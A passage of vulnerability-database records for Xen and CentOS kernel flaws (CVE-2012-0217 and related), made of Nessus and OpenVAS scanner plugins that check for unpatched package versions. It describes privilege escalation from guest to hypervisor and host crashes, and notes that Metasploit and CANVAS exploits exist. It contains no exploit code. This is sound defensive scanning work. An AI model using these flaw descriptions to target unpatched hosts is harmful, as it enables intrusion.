Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* It was found that the Xen hypervisor implementation as shipped with\nRed Hat Enterprise Linux 5 did not properly restrict the syscall\nreturn addresses in the sysret return path to canonical addresses. An\nunprivileged user in a 64-bit para-virtualized guest, that is running\non a 64-bit host that has an Intel CPU, could use this flaw to crash\nthe host or, potentially, escalate their privileges, allowing them to\nexecute arbitrary code at the hypervisor level. (CVE-2012-0217,\nImportant)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs,\nleading to a CPU hard lockup, when running on the Xen hypervisor\nimplementation. An unprivileged user in a 64-bit para-virtualized\nguest could use this flaw to crash the host. Warning: After installing\nthis update, hosts that are using an affected AMD CPU (refer to Red\nHat Bugzilla bug #824966 for a list) will fail to boot. In order to\nboot such hosts, the new kernel parameter, allow_unsafe, can be used\n('allow_unsafe=on'). This option should only be used with hosts that\nare running trusted guests, as setting it to 'on' reintroduces the\nflaw (allowing guests to crash the host). (CVE-2012-2934, Moderate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users\ncan exploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these\nissues. Upstream acknowledges Rafal Wojtczuk as the original reporter\nof CVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. 
The system must be\nrebooted for this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-June/018678.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fe9573fb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0217\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-debug-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-debug-devel-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-devel-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-doc-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-headers-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-xen-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-xen-devel-2.6.18-308.8.2.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-devel / kernel-debug / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:38:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "The remote host is missing an update to xen\nannounced via advisory DSA 2501-1.", 
"modified": "2019-03-18T00:00:00", "published": "2012-08-10T00:00:00", "id": "OPENVAS:136141256231071479", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071479", "type": "openvas", "title": "Debian Security Advisory DSA 2501-1 (xen)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2501_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2501-1 (xen)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71479\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:07:04 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"Debian Security Advisory DSA 2501-1 (xen)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202501-1\");\n script_tag(name:\"insight\", value:\"Several vulnerabilities were discovered in Xen, a hypervisor.\n\nCVE-2012-0217\nXen does not properly handle uncanonical return addresses on\nIntel amd64 CPUs, allowing amd64 PV guests to elevate to\nhypervisor privileges. 
AMD processors, HVM and i386 guests\nare not affected.\n\nCVE-2012-0218\nXen does not properly handle SYSCALL and SYSENTER instructions\nin PV guests, allowing unprivileged users inside a guest\nsystem to crash the guest system.\n\nCVE-2012-2934\nXen does not detect old AMD CPUs affected by AMD Erratum #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the allow_unsafe option is passed.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 4.0.1-5.2.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), these problems have been fixed in version\n4.1.3~rc1+hg-20120614.a9c0a89c08f2-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your xen packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to xen\nannounced via advisory DSA 2501-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libxen-dev\", ver:\"4.0.1-5.2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxenstore3.0\", ver:\"4.0.1-5.2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-docs-4.0\", ver:\"4.0.1-5.2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-hypervisor-4.0-amd64\", ver:\"4.0.1-5.2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-hypervisor-4.0-i386\", ver:\"4.0.1-5.2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-utils-4.0\", ver:\"4.0.1-5.2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xenstore-utils\", ver:\"4.0.1-5.2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n 
exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "The remote host is missing an update to xen\nannounced via advisory DSA 2501-1.", "modified": "2017-07-07T00:00:00", "published": "2012-08-10T00:00:00", "id": "OPENVAS:71479", "href": "http://plugins.openvas.org/nasl.php?oid=71479", "type": "openvas", "title": "Debian Security Advisory DSA 2501-1 (xen)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2501_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2501-1 (xen)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities were discovered in Xen, a hypervisor.\n\nCVE-2012-0217\nXen does not properly handle uncanonical return addresses on\nIntel amd64 CPUs, allowing amd64 PV guests to elevate to\nhypervisor privileges. 
AMD processors, HVM and i386 guests\nare not affected.\n\nCVE-2012-0218\nXen does not properly handle SYSCALL and SYSENTER instructions\nin PV guests, allowing unprivileged users inside a guest\nsystem to crash the guest system.\n\nCVE-2012-2934\nXen does not detect old AMD CPUs affected by AMD Erratum #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the allow_unsafe option is passed.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 4.0.1-5.2.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), these problems have been fixed in version\n4.1.3~rc1+hg-20120614.a9c0a89c08f2-1.\n\nWe recommend that you upgrade your xen packages.\";\ntag_summary = \"The remote host is missing an update to xen\nannounced via advisory DSA 2501-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202501-1\";\n\nif(description)\n{\n script_id(71479);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:07:04 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"Debian Security Advisory DSA 2501-1 (xen)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libxen-dev\", ver:\"4.0.1-5.2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxenstore3.0\", ver:\"4.0.1-5.2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-docs-4.0\", ver:\"4.0.1-5.2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-hypervisor-4.0-amd64\", ver:\"4.0.1-5.2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-hypervisor-4.0-i386\", ver:\"4.0.1-5.2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-utils-4.0\", ver:\"4.0.1-5.2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xenstore-utils\", ver:\"4.0.1-5.2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-31T18:42:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "The remote host is missing an update for the 'xen' package(s) announced via the referenced advisory.", "modified": "2020-01-31T00:00:00", "published": "2012-12-13T00:00:00", "id": "OPENVAS:1361412562310850281", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310850281", "type": "openvas", "title": "openSUSE: Security Advisory for xen (openSUSE-SU-2012:0886-1)", "sourceData": "# Copyright (C) 2012 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850281\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-12-13 17:02:09 +0530 (Thu, 13 Dec 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"openSUSE-SU\", value:\"2012:0886-1\");\n script_name(\"openSUSE: Security Advisory for xen (openSUSE-SU-2012:0886-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone 
Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE12\\.1\");\n\n script_tag(name:\"affected\", value:\"xen on openSUSE 12.1\");\n\n script_tag(name:\"insight\", value:\"This update of XEN fixed multiple security flaws that could\n be exploited by local attackers to cause a Denial of\n Service or potentially escalate privileges. Additionally,\n several other upstream changes were backported.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"xen-debugsource\", rpm:\"xen-debugsource~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-devel\", rpm:\"xen-devel~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default\", rpm:\"xen-kmp-default~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default-debuginfo\", rpm:\"xen-kmp-default-debuginfo~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-desktop\", rpm:\"xen-kmp-desktop~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-desktop-debuginfo\", rpm:\"xen-kmp-desktop-debuginfo~4.1.2_17_k3.1.10_1.16~1.10.1\", 
rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs\", rpm:\"xen-libs~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo\", rpm:\"xen-libs-debuginfo~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU\", rpm:\"xen-tools-domU~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU-debuginfo\", rpm:\"xen-tools-domU-debuginfo~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-doc-html\", rpm:\"xen-doc-html~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-doc-pdf\", rpm:\"xen-doc-pdf~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-32bit\", rpm:\"xen-libs-32bit~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo-32bit\", rpm:\"xen-libs-debuginfo-32bit~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools\", rpm:\"xen-tools~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-debuginfo\", rpm:\"xen-tools-debuginfo~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo-x86\", rpm:\"xen-libs-debuginfo-x86~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-x86\", rpm:\"xen-libs-x86~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-pae\", 
rpm:\"xen-kmp-pae~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-pae-debuginfo\", rpm:\"xen-kmp-pae-debuginfo~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "description": "The remote host is missing an update for the 'xen' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:1361412562310864509", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864509", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-9386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-9386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082824.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864509\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:35:18 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-9386\");\n script_name(\"Fedora Update for xen FEDORA-2012-9386\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"xen on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == 
\"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~20.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-08T12:56:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "description": "Check for the Version of xen", "modified": "2018-01-08T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:864509", "href": "http://plugins.openvas.org/nasl.php?oid=864509", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-9386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-9386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
